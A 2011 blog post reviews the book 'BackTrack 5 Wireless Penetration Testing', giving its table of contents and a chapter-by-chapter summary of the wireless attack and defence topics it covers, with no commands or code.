Thursday, November 10, 2011

Book of the Month – BackTrack 5 Wireless Penetration Testing


Here is the core information about the book,

  • Title: BackTrack 5 Wireless Penetration Testing
  • Author: Vivek Ramachandran
  • Publisher: Packt Publishing
  • Pages: 220
  • Release Date: September 9, 2011
  • Rating(Amazon):

Here is the table of contents
Chapter 1: Wireless Lab Setup
Chapter 2: WLAN and Its Inherent Insecurities
Chapter 3: Bypassing WLAN Authentication
Chapter 4: WLAN Encryption Flaws
Chapter 5: Attacks on the WLAN Infrastructure
Chapter 6: Attacking the Client
Chapter 7: Advanced WLAN Attacks
Chapter 8: Attacking WPA-Enterprise and RADIUS
Chapter 9: WLAN Penetration Testing Methodology
Appendix A: Conclusion and Road Ahead
Appendix B: Pop Quiz Answers

First chapter starts with the famous line from ‘Abraham Lincoln’ pressing on the importance of setting up the play ground,
If I had eight hours to chop down a tree, I’d spend six hours sharpening my axe.
It lists both hardware/software requirements with 2 Wi-Fi enabled laptops, one injectible Wi-Fi card (Alfa AWUS036H) & a access point. Some more listing of alternative injectible Wi-Fi cards would have been better though. It is often difficult to get the right one especially for those who are outside USA/UK. In my initial days of wardriving, I remember waiting for entire year to get my first injectible USB dongle. And without the right card, you are on the back foot as you can’t perform most of the attacks.
Remaining portion of first chapter shows how to install BackTrack, Setting up access point and wireless cards in detail with screenshots. Next one explains in brief about wireless frames and shows how to capture the Wi-Fi packets in the air and inject your own packets using Alfa card.
It goes more interesting with chapter 3 showing how to bypass various wireless security restrictions such as hidden SSIDs, defeating MAC filters, bypassing WEP authentication etc. Next it shows how to really crack those 128 bit WEP keys using aircrack-ng tool. Finally it describes how we can use these cracked WEP/WPA passphrase to decrypt wireless data packets and directly connect to WEP/WPA network.
Chapter 5 explains various Denial of Service (DoS) attacks including De-Authentication, Dis-Association, CTS-RTS attack & spectrum jamming. It also shows how one can perform ‘Evil Twin’ attack against legitimate Access point and how to setup rogue access point to gain backdoor entry into the network.
Often the weakest point lies at the client side, so the chapter 6 goes to describe all those attacks one can perform on wireless clients including Honeypot and Mis-Association attacks, Caffe Latte attack, De-Authenticaton and Dis-Association attacks, Hirte attack, AP-less WPA-Personal cracking etc. Next one shows how to perform wireless based Man-in-the-Middle (MITM) attacks and then use it for sniffing and hijacking of user sessions.
Chapter 8 focuses on WPA-enterprise based attacks such as exploiting the weakness in PEAP, EAP-TLS protocols. It ends with recommendation on secure wireless configuration using ‘WPA2-PSK with a strong passphrase’ for smaller/medium size organizations and ‘WPA2-Enterprise with EAP-TLS’ for larger organizations.
Final chapter touches very briefly on pen testing methodologies and then goes more into wireless pen testing using the attacks explained in previous chapters. It starts with step by step of discovery of wireless devices, finding unauthorized clients, rogue access points and then cracking the wireless encryption using the attacks demonstrated in previous chapters.

No comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...